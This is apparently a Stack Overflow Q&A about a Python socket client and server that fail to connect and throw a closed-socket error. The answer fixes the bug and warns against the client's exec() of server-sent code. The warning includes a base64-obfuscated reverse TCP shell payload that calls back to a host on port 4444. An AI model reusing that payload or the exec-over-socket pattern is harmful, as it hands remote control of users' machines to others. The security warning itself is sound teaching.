# python sockets not connecting on two different machines

Tags: python, sockets, server, client

I recently learnt socket library in python. I'm coding a game's multiplayer server but before coding the whole multiplayer server I decided to code a small server just for seeing how a server works in python. When I coded the server it was awkward that my code was working fine when I ran the client and server on my own windows 10 computer , it connected and did it's work(it's work is two get the IP from hostname, but the client will send hostname and the code for getting IP is executed in the server and sent back to the client) but when I shared the client file with my friend then the client and server did not connect, there was no error message or something else, firewall is not blocking any connections, so why aren't they connecting? Here's the code in the server file(The print statements are just for making a loading bar effect):

```
import socket
from time import sleep
#Default port number: 1234
server=socket.socket()
def run_server(port=1234):
    print('Booting server...')
    print('|-|-|-',end='')
    sleep(0.05)
    server.bind(('',port))
    print('|-|-|-',end='')
    sleep(0.05)
    server.listen(5)
    print('|-|-|',end='')
    sleep(0.05)
    print('\nServer is running and can be accessed now\n===============================================')
    while True:
        c,addr=server.accept()
        print('recieved connection from: ',addr)
        c.send(bytes("ip=bytes(input('Welcome. Enter hostname to extract ip from: '),'utf-8')",'utf-8'))
        c.send(bytes('_socket.send(ip)','utf-8'))
        reply=c.recv(1024).decode('utf-8')
        try:
            ip=socket.gethostbyname(reply)
        except:
           c.send(bytes('''print("The hostname is either invalid or wasn't found")''','utf-8'))
           c.send(bytes('_socket.close()','utf-8'))
           continue
        c.send(bytes("print('"+ip+"')",'utf-8'))
        c.send(bytes('_socket.close()','utf-8'))
run_server()
```

And the code in the client:

```
import socket
def run(mode='client'):
    _socket=socket.socket()
##    if mode=='client':
    _socket.connect(('192.168.0.101',1234))
##        return True
    while True:
        command=_socket.recv(1024).decode('utf-8')
        exec(command)
##    if mode=='server':
##        _socket.bind((socket.gethostname(),1234))
##        _socket.listen(5)
##        while True:
##            client,addr=_socket.accept()
##            msg=client.recv(1024)
##            if msg[-1]!=b'.':
##                continue
##            else:
##                _socket.close()
##                break
##        return pickle.loads(msg)
while True:
    try:
        run()
    except OSError:
        continue
```

(ignore the commented code, I just kept it so I can copy it in other files when needed)

ADDITIONAL INFO(which I missed before): In the `client.py` file, you'll see the last few lines are a `try` and `except OSError` block. I added this block because I don't know why but when I run the client, I get this error:

```
Traceback (most recent call last):
  File "C:\Users\DEVDHRITI\Desktop\Files&Folders\HMMMMM\python\client.py", line 24, in <module>
    run()
  File "C:\Users\DEVDHRITI\Desktop\Files&Folders\HMMMMM\python\client.py", line 8, in run
    command=_socket.recv(1024).decode('utf-8')
OSError: [WinError 10038] An operation was attempted on something that is not a socket
```

When I hide this error using the `try` and `except` blocks, there's no difference, the client works fine without showing any problems. Does anyone know why is this happening?

Comment: `An operation was attempted on something that is not a socket` usually means you're closing the socket then attempting to use it. Also it should be pointed out, your use of `exec` is extraordinarily dangerous and would allow anyone on the other end of the socket to own your computer if they had the knowledge.

Comment: `except:` is also a bad practice. You're telling the remote end to close on error without actually checking what the error is, or printing out the error. Change the `except` to include the exact exception you're expecting. I suspect you're sending a close command to the other end then attempting to use the closed socket.

Comment: I didn't actually think of that, thx @Carcigenicate, I'll remove `exec` but actually the server sends commands so it's safe for me, and I did not understand how to fix the problem exactly tho....

Comment: Instead of issuing code to the client to get them to close, send some indicator value like "CLOSE", or some byte sequence. Your code is currently dangerous because the server can send arbitrary code to the client, and the client will blindly execute it. Another weird thing is your server is only ever sending one command to the client, then tells the client to close itself. Your client on the other hand create a single socket, then attempts to read infinite-many things from the server. After the client loops once, it closes itself at the command of the server.

Comment: That last part is important because your client will receive the command to close itself, but will then attempt to `recv` more commands using the already-closed socket. Just don't have the server tell the client to close right away.

Comment: It worked! thx @Carcigenicate, please put that in an answer, i will accept it

Comment: Just I sec, I'm doing up an example.

Comment: OK but I'll be online either tmrw or after around 20 or 10 mins

Answer (score 1, accepted):

`An operation was attempted on something that is not a socket` usually means that you're attempting to do operations on a closed socket. I haven't run your code, but what I believe is happening is you have your server sending a single command to the client, then instructing the client to close. The client however attempts to accept infinite messages from the server; *even after the client's socket has been closed*.

Either have the client only accept a single message, or stop having the server tell the client to close itself.

I'd change the client code to something like this:

```
try:
    while True:
        command=_socket.recv(1024).decode('utf-8')
except KeyboardInterrupt:
    _socket.close()
```

And now the client can press <kbd>ctrl</kbd>+<kbd>c</kbd> to close itself when it wants to exit.

---

Also, **do not** ever use `exec` like you are; especially without checking what you're about to `exec`ute. If the server was ever compromised, or the server owner became malicious, or if you swapped it and had the client send commands to the server, you're opening yourself up to having the machine running `exec` to become compromised. If the sending end of the socket sent code like this for example:

```
# Do not run this!
exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMTIwLjEyOScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoemxpYi5kZWNvbXByZXNzKGJhc2U2NC5iNjRkZWNvZGUoZCkpLHsncyc6c30pCg==')[0]))
```

This would cause the `exec`'ing computer to start up a reverse TCP shell, and give control of their computer to the other machine! The other end would then be able to do anything they want on your computer (or, at least whatever they have the access rights to do).

You should never really ever use `eval` or `exec` unless it's used in a place where user's code will never enter it. Feeding user input directly into `exec` is extraordinarily dangerous and should be avoided at all costs.